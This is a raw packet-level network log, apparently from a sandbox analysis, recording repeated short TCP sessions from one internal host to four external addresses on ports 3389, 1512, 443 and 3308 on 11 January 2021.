Jan 11, 2021 16:53:38.448621035 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.515508890 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.515676022 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.521392107 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.521574020 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.576735973 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.576877117 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.614995956 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.630475998 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.630500078 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.722421885 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.722440004 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.722565889 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.722743988 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.728241920 CET	49317	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:38.782927036 CET	3389	49317	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:38.837829113 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:38.890527964 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:38.890642881 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:38.892054081 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:38.944715977 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:38.951530933 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:38.951544046 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:38.951673985 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:38.966710091 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:39.020673990 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.020845890 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:39.030095100 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:39.030307055 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:39.083013058 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.083250999 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:39.120565891 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.136292934 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.136419058 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.235039949 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.235054016 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.235146999 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:39.238384008 CET	49318	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:39.290957928 CET	1512	49318	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:39.348105907 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.401257992 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.401344061 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.402337074 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.454320908 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.461967945 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.462073088 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.473932981 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.527708054 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.527861118 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.532124996 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.532336950 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.586108923 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.586257935 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.638201952 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.755275011 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.755295992 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.755481958 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.758558035 CET	49319	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:39.811336994 CET	443	49319	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:39.867881060 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:39.911753893 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:39.911840916 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:39.912703037 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:39.955662966 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:39.969979048 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:39.969997883 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:39.970055103 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:39.980613947 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:40.025497913 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:40.025584936 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:40.034734964 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:40.035134077 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:40.078068018 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:40.078195095 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:40.121329069 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:40.232686043 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:40.232702017 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:40.232901096 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:40.238553047 CET	49320	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:40.281414986 CET	3308	49320	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:40.346755028 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.400223970 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.400331974 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.401603937 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.455827951 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.489104986 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.489137888 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.489226103 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.489249945 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.497049093 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.561583042 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.562819958 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.568137884 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.568262100 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.622114897 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.622324944 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.667433023 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.676038027 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.676067114 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.772593021 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.772615910 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.772792101 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.772970915 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.778605938 CET	49321	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:40.836049080 CET	3389	49321	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:40.897553921 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:40.950499058 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:40.950602055 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:40.951740026 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.005085945 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.011708021 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.011744022 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.011918068 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.011956930 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.024468899 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.078727007 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.078969002 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.088947058 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.089265108 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.142268896 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.142575026 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.181040049 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.195692062 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.195718050 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.298878908 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.298897982 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.299205065 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.304724932 CET	49322	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:41.357851982 CET	1512	49322	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:41.416497946 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.468748093 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.468883038 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.470865011 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.523135900 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.537756920 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.537837029 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.552855968 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.607464075 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.607568979 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.612093925 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.612237930 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.664279938 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.664377928 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.702950001 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.716602087 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.834192038 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.834229946 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.834548950 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.838514090 CET	49323	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:41.890614033 CET	443	49323	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:41.958972931 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.002561092 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.002723932 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.004147053 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.048034906 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.058567047 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.058605909 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.058708906 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.058763027 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.075579882 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.120592117 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.123644114 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.130479097 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.130724907 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.173841953 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.174118042 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.214184999 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.217375040 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.217462063 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.328600883 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.328629971 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.328849077 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.334157944 CET	49324	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:42.377194881 CET	3308	49324	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:42.438684940 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.492559910 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.492680073 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.494227886 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.548063993 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.577964067 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.578001976 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.578104019 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.590285063 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.650398016 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.650527954 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.661920071 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.662169933 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.715847015 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.715996027 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.755278111 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.769807100 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.769844055 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.861407042 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.861537933 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.861690044 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.867194891 CET	49325	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:42.921583891 CET	3389	49325	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:42.988017082 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.040838003 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.041013002 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.043004990 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.095813990 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.103085041 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.103123903 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.103235006 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.103261948 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.118995905 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.173775911 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.174015045 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.179532051 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.179685116 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.232347012 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.232572079 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.268753052 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.285239935 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.285274982 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.384064913 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.384104967 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.384315968 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.389906883 CET	49326	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:43.442826033 CET	1512	49326	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:43.502486944 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.555844069 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.555996895 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.557631016 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.609848976 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.624650955 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.624746084 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.639698982 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.694510937 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.694694042 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.706162930 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.706542015 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.758846045 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.759152889 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.813816071 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.938792944 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.938838959 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:43.938891888 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.938987970 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.942641973 CET	49327	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:43.994918108 CET	443	49327	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:44.049626112 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.092899084 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.093100071 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.094357967 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.137481928 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.149961948 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.149998903 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.150142908 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.164851904 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.210114956 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.210511923 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.220729113 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.221095085 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.264205933 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.264440060 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.304941893 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.307571888 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.307602882 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.418513060 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.418565989 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.418747902 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.424315929 CET	49328	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:44.467454910 CET	3308	49328	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:44.537461042 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.591725111 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.591887951 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.593480110 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.649343014 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.671597004 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.671643019 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.671791077 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.671838999 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.685934067 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.754125118 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.754339933 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.764190912 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.764399052 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.818507910 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.818809032 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.857562065 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.873699903 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.873749971 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.964107037 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.964149952 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:44.964350939 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.967832088 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:44.969953060 CET	49329	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:45.023931026 CET	3389	49329	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:45.079056978 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.132565975 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.132735968 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.134476900 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.188277006 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.195476055 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.195532084 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.195657015 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.195696115 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.209853888 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.263858080 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.263977051 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.275351048 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.275634050 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.328553915 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.328825951 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.364721060 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.381781101 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.485013008 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.485058069 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.485367060 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.491015911 CET	49330	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:45.543895006 CET	1512	49330	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:45.609719038 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.662122011 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:45.662254095 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.664153099 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.716371059 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:45.731394053 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:45.731513023 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.749038935 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.807544947 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:45.807657003 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.815187931 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.815665007 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.867964029 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:45.868268013 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:45.906826019 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:45.920619965 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:45.920700073 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:46.038333893 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:46.038381100 CET	443	49331	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:46.038615942 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:46.044238091 CET	49331	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:46.096456051 CET	443	49331	77.220.64.37	192.168.2.22
